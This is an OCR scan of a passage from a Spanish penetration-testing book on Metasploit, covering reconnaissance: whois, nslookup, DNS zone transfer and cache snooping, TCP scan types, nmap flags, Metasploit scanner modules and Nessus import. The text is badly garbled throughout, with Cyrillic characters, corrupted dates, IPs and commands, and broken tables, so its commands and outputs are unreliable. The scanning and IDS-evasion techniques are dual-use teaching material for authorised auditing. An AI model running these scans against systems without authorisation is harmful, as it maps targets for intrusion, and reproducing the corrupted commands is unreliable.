- 51 se realizan accionds de manera ilegal, el ofesional puede acabar siendo investigado | Prelimin ares 
o denunciado, incluso puc .endo acabar siendo cohdenado. , 7 


- Máxima confidencialidad sobre la informació que se puede іг obteniendo en el proceso 
і 


de las pruebas. 4 / | 
` 


- Respetar la рфуасї!ба@ de los usuarios. 
El objetivo de este libroles presentar la herramienta Metasploit en el ámbito de los tast de intrusión 
de una manera ética y moral para el profesional del sector de la seguridad. 


1. Ámbito 
| | 


` El presente capítulo engloba las fases de recolección deinfor: sación y análisis de vulnerabilidad 

- con la herramienta Metasploit. La fase de recolección de información proporcionará al auditor un 
gran volumen de datos sobre la organización a auditar. Se-dará una visión global de qué técnicas 
y procesos seguir para ir recogiendo información utilizando distintas ramas. La fase de análisis 
de vulnerabilidades propone realizar un estudio sobre posibles amenazas que pueden existir en un 
sistema, por lo que se utilizarán herramientas conocidas como escáneres de vulnerabilidades para 
tratar de obtener vías de ataque a los sistemas. 


Estas fases necesitan de gran paciencia por parte del auditor, no son las fases más vistosas del test. 
de intrusión, pero si son fases necesartas en las que el profesional debe obtener el mayor número de, 
información precisa acerca de como trabajan sus objetivos sin revelar la presencia del auditor о las 

- intenciones de éste. La utilización de google hacking, crear mapas dered de la organización para ` 
entender mejor la infraestructura de la empresa, planificar las acciones, investigar y el pensar como * 
un atacante son buenas prácticas que pueden ayudar al auditor a llevar a cabo con éxito esta fase y 
el resto de las fases del test de intrusión. 


La integración de escáneres de vulnerabilidades con Metasploit aporta gran flexibilidad у“ 
funcionalidad а las fases primarias del test de intrusión. En el presente capítulo se hará gran hincapié ` 
en esta funcionalidad e integración соп la que se pretende mostrar el potencial del frameworf. Este 
tipo de escáneres tienen ип funcionamiento básico en el que se envían unas peticiones en función de 

- la tecnología a Jas que se requiere auditar o investigar y se analizan las respuestas recibidas, en un 
esfuerzo para enumerar un número de vulnerabilidades presentes en el sistema remoto. Los sistemas 
operativos tienden a responder de manera distinta cuando son preguntados por ciertos paquetes de 
ciertos protocolos, debido a la implementación, por ejemplo, de la pila ТСРЛР. Estas respuestas 
ayudan a realizar fingerprint con lo que se pueden determinar versiones de sistemas operativos и 
otras aplicaciones, Además, aportando credenciales, se pueden enumerar las aplicaciones de que 
dispone un sistema, servicios y actualizaciones disponibles en la máquina. Por lo general, estas 
herramientas presentan un informe con las vulnerabilidades encontradas que se puede utilizar y 
se debe recapitular para el informe final. Este informe, servirá a priori al auditor nara realizar la 
siguiente fase del test de intrusión y contrastar dicha información. 
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2. Recogida de información 


En la fase de recogida de información se disponen de varias técnicas о vías para recolectar los datos. 
El footprinting consiste en la búsqueda de cualquier tipo de información pública, la cual ha sido 
publicada a propósito o con desconocimiento de la organización. Con la realización de este proceso se 
buscarán todas las huellas posibles, desde direcciones 1P pertenecientes а la organización, servidores 
internos, cuentas de correos de los usuarios de la empresa, nombres de máquinas, información de 
dominio, tipos de servidores, impresoras, cámaras [P, metadatos, etcétera. En conclusión, cualquier 
dato que puede resultar útil para lanzar distintos ataques en las fases posteriores del test de intrusión. 


El fingerprinting consiste en analizar las huellas que dejan las máquinas, por ejemplo para obtener 
el sistema operativo, la versión de una aplicación, puertos abiertos, existencia de firewalls, etcétera. 
Las huellas se detectan a travég,del análisis de las conexiones de red de estas máquinas, por ejemplo, 


en el tipo y forma de las respuestas al establecimiento de las conexiones. Este proceso es llevado а · 


cabo a través de 2 maneras, фе forma activa, es decir, las herramientas envían paquetes esperando 
una respuesta, y en función de dicha respuesta se pueden inferir ciertas propiedades de ciertas 
tecnologías concretas. Se utiliza una base de datos dónde se va comparando para obtener la realidad. 
La otra vía es la pasiva, dónde la herramienta escucha el tráfico para identificar máquinas que actúan 
en la red comparando las respuestas pero sin llegar a interactuar en la red. 


Técnicas pasivas 

La recolección de información pasiva o indirecta consiste en descubrir datos sobre los objetivos sin 
tocar los sistemas, es decir, sin interacción directa sobre los mismos. Se puede utilizar esta técnica 
para identificar los límites de la red, las principales redes, etcétera. 


Зхіѕіеп varias herramientas que permiten la recolección de información pasiva, como pueden ser 
whois, nslookup, google hacking, fuzzers, etcétera. Si se imagina un ataque contra el dominio de una 
empresa que contrata unos servicios, el objetivo del auditor en esta fase es delerminar, como parte 
de un test de intrusión, que sistemas de la organización se pueden atacar. En esta fase, se pueden 
descubrir sistemas que parecen de la organización pero no lo son, por lo que se deberían descartar 
por encontrarse fuera del alcance de la prueba de intrusión. i 


Whois 

Las herramientas del sistema se pueden lanzar desde una terminal de Linux 0 desde el interior de 
msfconsole. En realidad, cuando se ejecuta una herramienta de este tipo desde msfconsole, ésta lanza 
un exec del ejecutable que se requiere. 


Whois es una herramienta que permite al auditor o cualquier usuario realizar consultas en una base 
de datos para determinar el propietario de un nombre de dominio o una dirección 1P en la gran red, 
Internet. Hoy en día, existen gran cantidad de sitios web que ofrecen esta disponibilidad online 
aportando interfaces más amigables a los usuarios. 
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La información que se puede obtener con whois es la referente a los servidores DNS, domain 
name system, dónde se encuentra alojado el dominio, y quién es el propietario. Estos servidores 
no deberían entrar en un test de intrusión, por lo general, ya que se pueden encontrar fuera de los 
límites de la organización, e incluso pueden ser compartidos. Sin embargo, si la organización es 
grande y dispone de sus propios DNS, si puede ser factible el introducirlos en un test de intrusión, 
Existen ataques sobre estos servidores, los cuales pueden proporcionar gran cantidad de información 
e incluso mapas de red internos. 


asf > whois informatice64.com 
{*] exec; whois Informaticaó4.com 


Whois Server Version 2.0 


Domain names in the .com and „леї domains can now be registered 
with many different competing registrars. Go to http://www". internic.net 
for detailed information. 


Domain Маше; INFORMATICA64, СОН 


. Registrar; ARSYS INTERNET, S.L. D/B/A NICLINE.COM 
Whois Server: whois.nicline. com 

Referral URL: http://ww.nicline.com 

Mame Server: NS1.INFORMATICA64.COHM 

Name Server: №52, INFORMATICA64.COM 

Status: ok 

Updated Date: 82-5ер-2811 

Creation Date: 39-aug-2090 

Expiration Date: 30-aug-2821 


>>> Last update of whois database: Tue, 29 May 2012 07:37:52 UTC <<< 


Fig 2.01: Ejecución de whois sobre un dominio. 


Nslookup | 

Esta herramienta permite, entre otras cosas, verificar si el servidor DNS está resolviendo 
correctamente los nombres de dominio y las direcciones IP. Existe una versión tanto para sistemas 
operativos Windows como para sistemas basados en Unix. 


Esta aplicación pregunta al servidor DNS por la información que éste dispone en sus registros, Las 
consultas pueden ser globales o específicas hacia un servicio en concreto, por ejemplo, si se requiere 
resolver dónde se encuentran los servidores de correo de una organización, o cuales son y dónde se 
encuentran los servidores DNS, si dispone de alguno más u obtener la dirección ІР del servidor web 
dónde se encuentra alojada el sitio web, etcétera. 


Tras lanzar la aplicación, ya. sea en Windows o Linux, se disponen de distintos comandos para 
configurar a nslookup y que éste realice las peticiones como se requiera. Uno de los comandos que 
más juego aporta es ѕе/, con el que se configurarán las peticiones y la información que se recogerá de 
los servidores DNS. Por defecto, tras arrancar la aplicación nslookup envía las peticiones al servidor 
DNS configurado en la conexión a Internet. Existe el comando server con el que el usuario puede 
especificar a qué servidor DNS quiere enviar las peticiones. 


Para consultar información sobre un dominio, simplemente hay que escribir el nombre del dominio, 
por ejemplo informatica64.com, en la consola que abre nslookup. Para obtener el máximo de 
información sobre el dominio se puede utilizar la sentencia set g=any para la verston basada en 
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Unix y set q=all para la versión basada en Windows. Ahora si se ejecuta la sentencia anterior dónde 
se pregunta por información de un dominio, se obtendrá bastante más información, como puede ser 
nombres de dominio de los servidores DNS, servidores de correo, servidor del sitio web, dirección 
de correo del administrador, etcétera. 


> set q=any 
> informatica64.com 
Server: 8.8.8.8 
8.8.8.8#53 


Non-authoritative anfwer: 
Нате: — informatica64.com 
Address: 90.81.106, 117 
informatica64.com nameserver = ns2.informatica64,com. 
informatica64.com nameserver = ns1.informatica64.com. 
informatica64.com 
> origin = ns1.informaticab4.com Г 

mail addr = rodol.informatica64.com 

serial = 2085101226 

refresh = 3609 

retry = 3609 

expire = 1209608 : 

minimum = 3600 y 
informatica64.com mail Si = 18 correo. informaticabf.com. 
informatica64.com text = "y=spfl a a:mail.informatica64.net a:correo.informaticab4.com 1p4 
:89,81.106.148 ip4:89.81.196.146 -all" 


Fig 2.06: Recolección de servidores con nslookup. 


Transferencia de zona 
Los DNS permiten dividir el espacio de nombres en diferentes zonas, las cuales almacenan 
información de nombres de uno o más dominios. El origen autorizado sobre un dominio es la zona 


en la que se encuentra dicho dominio, es decir, es el encargado de la información acerca de dicho - 


dominio, Es extremadamente importante que las zonas se encuentren disponibles desde distintos 
servidores DNS por temas de disponibilidad. 


SÍ 


Ктр јео com 


Fig 2.03: Esquema de zonas. 


. DNS Snooping 
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Las transferencias de zona se crearon para que otros servidores, además del principal, 0 
alojar zonas replicando toda la información. Las transferencias de zona suceden en las siguiente 
situaciones: 


- Cuando se instala un nuevo servidor DNS y éste se configure en una zona existente 
- Cuando finaliza el plazo de actualización de una zona. 


- — Cuando se produce algún cambio en una zona y es necesario actualizar par la replicació pam 
‚ de los cambios. 


- Cuando manualmente se solicita la transferencia de zona. ' 


En el siguiente ejemplo se utiliza un ста ел Windows рага realizar la prueba de concepto о роо © 
of concept, PoC, de la transferencia de zona. En primer lugar, tras lanzar nslookup en un ста seo 


modificará la información que se quiere obtener con el uso del comando sef q=ns. А continuación) 


se introduce el dominio sobre el que sé quiere comprobar si existe la transferencia de zona. 


«ES 
Servidor: m не .ес 
ddress: Mi. 48. 4,2 


BA-ES Nameserver = ШЕЙ . MRH - ес 

UA es nameserver = nsi „ШШЕ б 

ЭР. paa. es internet address = HR 64 
- у. es internet address Ж И 


Fig 2.04: Configuración nslookup para probar la transferencia de zonas. 


Una vez que se dispone de los servidores DNS de la organización se utiliza el comando server, 
para cambiar el servidor DNS al que se realizarán las consultas con nslookup. Una vez realizada 
esta acción se utilizará el comando /s y el dominio sobre el que se tequiere información, si esef 
servidor DNS tiene activada la transferencia de zona se obtendrá gran cantidad de infor mación, que, 


` seguramente la empresa no quiera que $ea visible o no sabe que es visible. En bastantes ocasiones, 


es una mala configuración o un descuido del administrador el que provoca esta situación. 


> server п51 „Ш.С 
exrvidor Өй ерта: : 
ddress: Mies 2 


> 15 HO. es 


Fig 2.05: Солвеси бп de información con transferencia de zona. 


27 
Este tipo de ataque se enmarca tambiér зо la fase de descubrimiento y recolección de infor Шү 


DNS caché snooping, nombre real de la ,ulnerabilidad, es una técnica que permite al auditor conoce. 
los distintos nombres de dominio que мр sido resueltos por el servidor DNS у cuales nô, 
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El servidor DNS con esta vulnerabilidad está proporcionando información sobre la red al atacante, 
o en este caso al auditor. Esta fuga de información puede ayudar a un atacante a estudiar y explotar 
de manera eficiente otras vulnerabilidades, 


Técnicas activas 

Las técnicas activas para recolección de información consisten en interactuar directamente con los 
sistemas para aprender más sobre su configuración y comportamiento. Llevarán a cabo un escaneo 
de puertos para el estudio de los posibles puertos abiertos que se encuentren y determinar que 
servicios se están ejecutando, además de la versión del producto que se encuentra detrás del puerto. 


En los sistemas cada puerto que se encuentra abierto da una vía de explotación al auditor, por lo 
que esta información es muy valorada en esta fase. Hay que conocer los tipos de escaneos que 
se encuentran disponibles y saber configurar las herramientas para poder obtener el máximo de 
información posible. Hay que tener cuidado con los IDS(Intrusion Detection System), y firewalls 
que se puedan encontrar en el análisis de puertos. 


Tipos de escaneo 

Existen gran cantidad de tipos de escaneos, con diferentes objetivos. A continuación se van a estudiar 
los mismos. Herramientas como птар disponen de gran versatilidad y posibilidad de configuración, 
es recomendable estudiar el uso y configuración de esta potente herramienta, 


Half Scan | | 

Este tipo de escaneo consiste en realizar el procedimiento three-way handshake sin concluir рог 
completo para no crear una conexión. En otras palabras, el emisor envía un SYN para iniciar 
conexión, si el receptor envía un SYN+ACK significa que el puerto se encuentra abierto, entonces 
el emisor envía un RST+ACK para finalizar la conexión, en vez de un ACK que sería lo normal para 
crear la conexión. La viabilidad de este tipo de escaneo es alla, con gran fiabilidad en su ejecución. 


así > use auxiliary/scanner/portscan/tcp 
maf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 
Наше Current Setting Required Description 


CONCUNRENCY The number of concurrent ports to check per host 
FILTER The filter string for capturing traffic 
INTERFACE The name of the interface 

PCAPFILE The name of the РСАР capture file to process 
PORTS 1-10009 Ports to scan {е.9. 22-25,88,110-908) 

RHOSTS 192.168,1.39 The target address range ог CIDR identifier 
SNAPLEN 65535 з The number of bytes to capture 

THREADS 1 The number of concurrent threads 

TIMEOUT 1080 The socket connect timeout in milliseconds 
VERBOSE false Display verbose output 


msf auxiliary(tcp) > run 


{+} 192,168.1.39:139 - TCP OPEN 
[*] 192.168.1.39:135 - TCP OPEN 
[+] 192,168,1,39:445 - TCP ОРЕН 


Fig 2.06: Escaneo de tipo half scan. 
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Metasploit dispone de un módulo de tipo auxiliary para realizar este tipo de escaneos. El módulo se 
encuentra en la ruta auxiliary/scanner/portscan/tcp. Al mirar las opciones se puede configurar las 
direcciones ІР a escanear, el rango de puertos que se analizarán, la variable pcap/ile dónde se puede 
indicar la ruta de una captura de red con la que el módulo procese la información y la muestre, el 
timeout, etcétera. Este pequeño módulo es bastante útil para realizar este tipo de escaneo. 


ACK Scan | 

La finalidad de este escaneo es distinta, no es determinar si un puerto se encuentra abierto о по, si 
no si un equipo de la red escucha las peticiones a través de un firewall. El emisor envía un paquete 
con un АСК activo; el receptor debe responder con un RST esté el puerto abierto o no, si по existe 
respuesta es que hay un cortafuegos en medio de la comunicación. 


Metasploit dispone de un módulo, como el anterior de tipo auxiliary, para llevar a cabo este tipo de - 
escaneos y pruebas sobre equipos remotos y la comunicación con éstos. El módulo se encuentra en 
la ruta auxiliary/scanner/portscan/ack. Al mirar las opciones se pueden configurar las direcciones IP 
a escanear, el rango de puertos que se estudiarán, entre otros valores interesantes. 


Null Scan 

Este tipo de escaneo tiene una característica curiosa y es que el paquete que se envía no contiene 
ningún bit activo. El emisor envía este tipo de paquetes y si el puerto se encuentra abierto no se 
recibirá nada, si por el contrario el puerto se encuentra cerrado se envía un RST+ACK. Es por 
ello, que normalmente se puede encontrar en otros libros que este Про de escaneo tiene como fin 
averiguar cuales son los puertos TCP cerrados. 


Xmas Sean E 

Este tipo de escaneo tiene en sus paquetes los bits de control activos. Windows, por defecto, по. 
responde a este tipo de paquetes, pero antiguamente la pila ТСРЛР, respondía con un paquete 
RST+ACK cuando el puerto se encontraba cerrado, mientras que si el puerto se encontraba abierto 
no se respondía. La viabilidad de este tipo de escaneos no es ni mucho menos óptima, inclinándose 
hacia una viabilidad mala: 


nsf auxiliary(xmas) > use auxiliary/scanner/portscan/xmas 
sf auxiliary(xmas) > show options 


todule options (auxiliary/scanner/portscan/xmas): 


Name Current Setting Required Description 


car rr rr rr rr rs rr rs Amro 


BATCHSIZE 256 yes The number of hosts to scan per set 
INTERFACE no The name of the interface 

PORTS 1-10000 ` yes Ports to scan (e.9. 22-25,80,110-900) 
RHOSTS 192.168,1.39 yes The target address range or CIDR identifier 
SNAPLEN 65535 yes The number of bytes to capture 

THREADS 1 yes The number of concurrent threads 

TIMEQUT 500 yes The reply read timeout in milliseconds 


f auxiliary(xmas) > 


Fig 2.07: Módulo xmas auxiliary de Metasploit. 
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Metasploit dispone de un módulo, de tipo auxiliary, para levar a cabo este tipo de escaneo. Este 
módulo se encuentra en la ruta auxiliary/scanner/poriscan/xmas. Las opciones que dispone son 
parecidas a las del módulo de escaneo de tipo АСК. 


FIN Scan 


Este tipo de escaneo consiste en la creación de un paquete TCP con el bit de FIN activo. El emisor 


envía el paquete y si el puerto se encuentra abierto no se obtendrá respuesta, sin embargo, si el puerto 
se encuentra cerrado se recibirá un RST+ACK, El objetivo o finalidad de este tipo de escaneo es 
idéntico al пий scan y xmas scan, incluso algunos autores los agrupan como escaneos de detección 
de puertos cerrados a estos tipos. 


Connect Scan | ' 

Ез un tipo de escaneo antiguo, y quizá uno de los menos ori ginalespde los que se han podido estudiar 
en este Пого, Su funcionamiento es el siguiente, en primer lugar se realiza el proceso completo de 
three-way handshake, creando una conexión entre 2 máquinas si el puerto se encuentra abierto en 
la máquina víctima. Una vez que la conexión se encuentra establecida el servicio que se encuentra 
detrás бе dicho puerto se identifica enviando el banner del servicio, En este punto el emisor envía un 
ACK y por último un RST+ACK para forzar el cierre de la conexión. Se puede obtener además de la 
conclusión de que el puerto está abierto o no, la identificación del producto y la versión del servicio. 


Idle Scan 

Este escaneo es uno de los más complejos y su eficacia depende de la máquina elegida como zombie. 
En el escenario habrá al menos 3 máquinas, una es la del atacante, otra será la zombie o intermediaria 
y la última la víctima. La máquina del atacante debe chequear que el zombie utilice un algoritmo 
predecible para marcar los paquetes IP. Para averiguar este detalle el emisor o atacante envía varios 
paquetes con SYN+ACK para iniciar una conexión.El objetivo es obtener RST y chequear que los 
ID de las respuestas sean sucesivas o predecibles, También se debe verificar que la máquina zombie 
no esté teniendo tráfico, ya que si no el proceso sería inviable. 


Cuando el atacante haya encontrado una máquina zombie que pueda ser utilizada, el atacante enviará 
paquetes SYN a la máquina víctima haciendo /Р Spoofing. Los paquetes enviados desde la máquina 
atacante, con la dirección ЇР de la máquina zombie, a la víctima son en realidad un scan normal. La 
diferencia se encuentra en que las respuestas de la víctima irán destinadas a la máquina zombie, por 
la suplantación de 1P realizada por el atacante. | 


Cuando la víctima conteste a la petición SYN, devolverá un SYN+ACK si el puerto se encuentra 
abierto o un RST+ACK si el puerto se encuentra cerrado, Cuando la máquina zombie reciba un 
SYNFACK enviará un RST a la máquina víctima. Si la máquina zombie recibe un RST+ACK, se 
declarará como tráfico nulo y se descartará, 


Tras esperar un corto período de tiempo el atacante preguntará por el ID de los paquetes de la 


máquina zombie y pueden ocurrir 2 situaciones concretas, en primer lugar el ID se ha incrementado 
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en uno, entonces el puerto en la máquina víctima está abierto, о por el contrario sivel ID no se үч 
incrementado, el puerto se encuentra cerrado. E i 


nmap 
Esta herramienta, mundialmente conocida, permite al auditor explorar los puertos abiertos 


detección de servicios, averiguar versiones de productos, fingerprint del sistema operativo, enti 
otras acciones. La herramienta se encuentra disponible tanto para sistemas Linux como Windows. Г 


птар puede suponer, a primera vista, una herramienta costosa de utilizar por su flexibilidad q 
diversidad en las posibles acciones a realizar con ella. Es verdad que dispone de gran cantidad Y 
parámetros, por lo que se intentará listar algunos de interés relacionados con los tipos de escánere y 

vistos en este libro. También, se puede recomendar el uso de interfaces gráficas para la utilizació 
de птар, y de este modo simplificar el entendimiento y uso de la herramienta. 4 


La ejecución de log comandos птар se puede generalizar mediante el siguiente esquema птаф 
<tipo de scan> <opciones>. La ejecución por defecto seria la siguiente nmap <dirección ІР>, or 
la que se obtiene un reporte de la máquina con dicha dirección IP dónde se informa de los puerto 
abiertos, servicios encontrados o el estado de la máquina. Para ser el escaneo por defecto no es рос@ 
la información obtenida. 


A continuación se listan los diferentes parámetros que se deben añadir a la ejecución de ттар para 
obtener distintos resultados, en función de los tipos de escaneos vistos anteriormente. 


Parámetro | Descripción y ejemplo А 
О El escaneo realizará fingerprint del sistema operativo соп el objetivo de obtener la Г 
i versión de éste еп la o las máquinas remotas. Ejemplo: nmap -0 <dirección IP> 
р Con este parámetro se analiza qué equipos se encuentran activos en una red. | 
-5 К Р А 
Ejempio: птар -sP 192.168.0.0/24 | 
с Se lanza un escaneo sobre varios equipos o una red. Permite obtener un listado de 
ш puertos abiertos de éstos. Ejemplo: nmap —sS 192.168.0.0/24 
Permite realizar un escaneo de tipo Null Scan. Ejemplo: nmap -sN <dirección 
-sN 
1P> К 
а Permite realizar un escaneo de tipo FIN Scan. Ejemplo: птар -sF <dirección 4 
T. | 
ІР> | 
Permite realizar un escaneo de tipo XMAS Scan. Ejemplo: птар —®Х <dirección 
| -sX d 
ІР> М 
Se indica sobre qué puertos se debe realizar el escaneo. Ejemplo: ттар -р 4 
139,80,3389 <dirección ІР>. Para indicar rangos especificamos el puerto de la | 
-p 


siguiente manera 80-1500. Se realizará un análisis desde el puerto 80 hasta е] 
1500 т ж 
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Parámetro Descripción y ejemplo 


Este parámetro habilita la detección del sistema operativo, además de las versiones 
de servicios y del propio sistema. Ejemplo: ттар -A <dirección ІР> 

Permite realizar un escaneo de tipo idle. Ejemplo: nmap -P0 -p - -s1 <dirección 
zombie> <dirección víctima>. Cabe destacar que la opción —p — permite realizar 
un escaneo sobre todos los puertos de la máquina, esta acción puede provocar que 
el escaneo se ralentice en gran medida 


Obtener las versiones de los productos. Ejemplo: птар ~s Y <dirección IP> 
| jemp р 


Permite exportar la información del análisis еп un archivo XML. Ejemplo: птар 
0 -sV <dirección IP> -oX archivo.xml. Con la opción —oN se puede exportar la 
información en un fichero de texto 


Tabla 2.01: Parámetros para obtener información variada con птар. 


Hay que destacar que cuando nmap devuelve que un número determinado de puertos han sido 
filtrados, no quiere decir que determinados estén cerrados.. Cuando el mensaje indique que el puerto 
se encuentra filtrado, quiere decir que esa máquina dispone de un firewall el cual está filtrando esas 
peticiones a ciertos puertos, mientras que si el mensaje indica que el puerto está cerrado quiere decir 
que se ha obtenido respuesta de la máquina al analizar ciertos puertos, pero que éstos se encuentran 
sin ningún servicio. 


Existen otros estados que son los siguientes: 
- Cerrado, el puerto es accesible pero no hay servicio en él 


- М№о filtrado, el puerto es accesible pero no se puede determinar si se encuentra abierto о 
cerrado 


- Otros 2 estados que indican que no se puede determinar si el puerto está abierto o filtrado, 
y si el puerto está cerrado o filtrado. 


Una de las operativas más interesantes es la evasión de sistemas de detección de intrusos mediante 
la fragmentación de los paquetes, spoofing de direcciones MAC, señuelos, spoofing de direcciones 
IP, etcétera. Para obtener más información sobre las posibilidades de nmap se aconseja la visita y 
lectura del sitio web oficial Attp://nmap.org/manles/. 


Importación de resultados de nmap a Metasploit 

Este apartado es realmente interesante ya que Metasploit permite la importación de los resultados 
obtenidos con la herramienta nmap. La utilización de tal importación está justificada, ya que cuando 
se realiza un test de intrusión con gran número de máquinas y aspectos a tener en cuenta se deben 
controlar todos éstos. 


En el libro se utilizará el motor PostgreSQL, pero se pueden utilizar otros, como por ejemplo, MySQL. 
En primer lugar se deberá disponer de la base de datos arrancada, por lo que la primera acción a 
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llevar а cabo es /etc/init.d/postgresql-8.4 start, la versión puede variar en función de la descarga 
realizada de PostgreSQL. Pueden surgir ciertos aspectos o problemas que impidan la creación de las 
tablas, por parte del framework. Por ejemplo, la contraseña del usuario postgres, para cambiar dicha 
contraseña debe ejecutarse las siguientes órdenes como se puede observar en la siguiente imagen. 


rootároot:-*+ sudo su postgres -c psq 
could not change directory to "/root" 
psal (8.4.8) 

Type "help" for help. 


postgres=4 alter user postgres with password *123abc.*; 
ALTER ROLE 
postgres=H* Xq 


could not save history to file "/home/postgres/.psql history": No such file or d 
irectory 


Fig 2.08: Modificación de credenciales del usuario postgres. 


msf > db connect postgres:123abc.(127.86.0,1/test_libro 
NOTICE: CREATE TABLE will create implicit sequence "hosts id seq" for serial co 
tumn “hosts. id" 

NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts pkey" for 

table "10515" | 

NOTICE: CREATE TABLE will create implicit sequence "clients id seq" for serial 

column “clients. id" 

NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients ркеу" fo 
г table "clients" 

NOTICE: CREATE TABLE will create implicit sequence "ѕегуісеѕ ій ѕед" for serial 
column "services, id" 


Fig 2.09: Conexión del framework con la base de datos, 


Para comprobar el estado del framework respecto a la base de datos se puede utilizar el comando 
db status. Si todo ha ido correctamente se obtendrá el mensaje postgresql connected to <nombre 
рраа>. 


A continuación se debe importar el fichero generado anteriormente con »map, el cual dispone de los 
distintos resultados obtenidos con esta herramienta. El comando para realizar dicha importación es 
db_import <fichero XML>. 


msf > db import resultadosNMAP.xml 
[*] Importing 'Nmap XML' data 

[*] Importing host 192,168,1.39 
[+] successfully imported /root/resultadosNMAP.xml 


msf > 


Fig 2.10: Importación de resultados de ттар a Metasploit. 


Una vez se ha importado el fichero correctamente se disponen de ciertos comandos que interactúan 
con la información almacenada como son db_hosts, db_services, db_notes, entre otros. 


El comando db hosts permite realizar búsquedas y consultas sobre la información de los equipos 
que se encuentran importados en la base de datos. Hay que tener en cuenta, que cuando se utiliza 
una base de datos es que se dispone de gran cantidad de información sobre equipos, servicios de 


Metasploit para Pentesters 


éstos, versiones de los servicios, etcétera. Es por ello que el comando db_hosts es fundamenta! para 
realizar consultas sobre características de algunos equipos y delimitar el rango de acción. 


Los parámetros de db_hosts son los que se pueden visualizar a continuación, 


Descripción y ejemplo 


Realiza una búsqueda de direcciones. Ejemplo: db hosts ~a <direcciónl, 
dirección2, ..., direcciónN> 


| Filtra información de las columnas que se requiera. Ejemplo: dh hosts —c 
-C <columnal, columna2, ..., columnaN>. Las columnas pueden ser name, os_name, 
state, address, os_lang, os_sp, etcétera 


Solo muestra los equipos que se encontraban activos o levantados. Ejemplo: db 
hosts -u 


Se envía la salida a un fichero en formato CSV. Ejemplo: db_hosts—o <fichero> 


Se añade a la variable RHOSTS las máquinas obtenidas en la búsqueda. Ejemplo 
db_hosts —R 


Tabla 2.02: Parámetros para obtener información variada con db_hosts, 


El comando db_services permite obtener información sobre los distintos servicios disponibles 
en las máquinas analizadas, puertos abiertos, protocolos, etcétera. Este comando dispone de los 
mismos parámetros que db_hosts, con el mismo significado, pero además aporta otros que añaden 
funcionalidad. 


Parámetro Descripción y ejemplo 


> Realiza una búsqueda por nombre de servicios. Ejemplo: db_services -n netbios- 
SSA | 


| 
| 


Realiza una búsqueda por puertos, Ejemplo: dh_services -p 139,445,3389, Se 
devuelve la máquina que dispone de alguno de los puertos abiertos 


Muestra sólo información sobre protocolo TCP б UDP. Ejemplo db_services =r 
tcp 


Tabia 2.03: Parámetros para obtener información variada con «/h_services, 


Es importante recalcar que los parámetros deben ser ejecutados utilizando varios a la vez para afinar 
las búsquedas y sacar el máximo provecho de la base de datos y el proceso de filtrado sobre ésta. Por 
ejemplo, «b_services ~a 192.168.1.39 -n msrpc —r tcp, de esta manera se está filtrando con mayor 
restricción y seguro que el auditor consigue afinar más su búsqueda. 


El comando db_notes permite al auditor visualizar notas o información sobre los equipos. Este 
comando dispone de un parámetro que es el ~a con el que el auditor puede realizar búsqueda de 
notas de equipos a través de sus direcciones JP, 
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El comando db_vulns permite al auditor obtener información sobre las vulnerabilidades que disponen 
los equipos escaneados. Además, se obtiene la referencia de la vulnerabilidad por lo que se puede 
obtener información extra fácilmente buscándola en sitios web como http://cve.mitre. ore/index.htmip 
б tip: /www.securityfocus.com. 


Integración de птар con el framework ' 
Metasploit dispone de la posibilidad de utilizar la herramienta nmap de manera integrada con elq 
framework. Se recomienda la utilización de птар соп Metasploit y el uso de la base de datos, que se , 
ha explicado en el apartado anterior, de esta forma se puede almacenar toda la información posible, 
para así después poder consultar dicha información, o utilizar la técnica cutopwn para probar la 
seguridad de los equipos. 


4 
El comando para utilizar nmap en la msfeonsole de Metasploit es db_nmap. Por debajo se utiliza. 
птар por lo que las opciones son las mismas. Tras la utilización de db_nmap, si se dispone de la 
conexión con la base de datos, los resultados quedan almacenados en ésta. 


3. Escáneres de vulnerabilidades 


+ 


Los escáneres de vulnerabilidades permiten al auditor evaluar sistemas informáticos, equipos, redes, 
verificar actualizaciones, versiones, etcétera. Existen gran cantidad de escáneres, los cuales ayudan 
al auditor а realizar distintas pruebas y poder llegara ciertas conclusiones sobre el status de seguridad 
de una organización. Los escáneres disponen de un objetivo común, enumerar vulnerabilidades de 
seguridad en uno o más equipos de una red u organización. Por otro lado, existen distintos enfoques 


en los escáneres de vulnerabilidades, es decir, disponen de diferentes funcionalidades para realizar 
la evaluación. | 


La información obtenida tras el análisis de las máquinas, redes, servicios, productos, etcétera, puede 
servir al auditor para detectar vulnerabilidades conocidas o recientemente descubiertas que pudiesen 
ser explotadas por un potencial atacante. 


Compatibilidad con los ficheros de información de escáneres 
Metasploit dispone de la posibilidad de importar archivos de escaneos realizados con gran cantidad 
de escáneres de vulnerabilidades, Esta funcionalidad aporta un nivel de integración del framework 
enorme con las herramientas de seguridad que se encuentran en el mercado. 


Los formatos compatibles con la importación a Metasploit se pueden visualizar a continuación: 
-  Acunetix XML 
- Атар Log 
- Аррхсап XML 
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- Burp Session XML 

- Соғ Impact Pro XML 

- — Foundstone Network Inventory XML 
- IP Address List 

-  Libpcap 

-  Microsofí MBSA SecScan XML 
-nCircle 1P360 (XMLv3 y ASPL) 
- Metasploit PWDump Export 

- Metasploit Zip Export 

- Metasploit XML 

-  NetSparker XML 

- — nessus XML y NBE (vi y v2) 

-  Nexpose Simple XML 

- Мехроѕе XML Export 

- Nmap XML 

- Qualys Asset XML 

- Qualys Scan XML 

- Retina XML 


Escáner nessus e importación de datos 

nessus es uno de los escáneres con mayor flexibilidad y utilización en el mundo de la auditoría. Es 
una herramienta de la empresa estadounidense Tenable Network Security la cual dispone de distintas 
funcionalidades como son descubrimiento activo de redes, escaneo de vulnerabilidades distribuido 
y políticas de auditorías. La exportación a ficheros de estos escaneos es una funcionalidad muy 
interesante para poder exportar los resultados а Metasploit. Se pueden importar ficheros de tipo 
NBE y XML creados con la herramienta, los cuales serán importados con el comando db_import, 
previa conexión de la base de datos. | 


Por otro Jado, el framework dispone de un plugin el cual permite utilizar la herramienta nessus en el 
entorno de msfconsole e incluir los resultados directamente en la base de datos de Metasploit para 
ser explotados еп la siguiente fase del test de intrusión. Este plugin es cargado mediante la ejecución 
de la instrucción load nessus en una sesión de msfconsole. 


rootGroot: /opt/nessus/hbiné ./nessus-fetch --register iaa - MRE) - 5 - SAF- ФИД 
Your activation code has been registered properly - thank you. 
Now fetching the newest piugin set from plugins.nessus.org... 


Fig 2.11: Activación de nessus. 
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Para usar nessus se debe disponer de la herramienta registrada, obteniendo un código de activación en 
la siguiente URL At(p://www.nessus.org/producis/nessus/nessus-plugins/obtain-an-activation-code. 
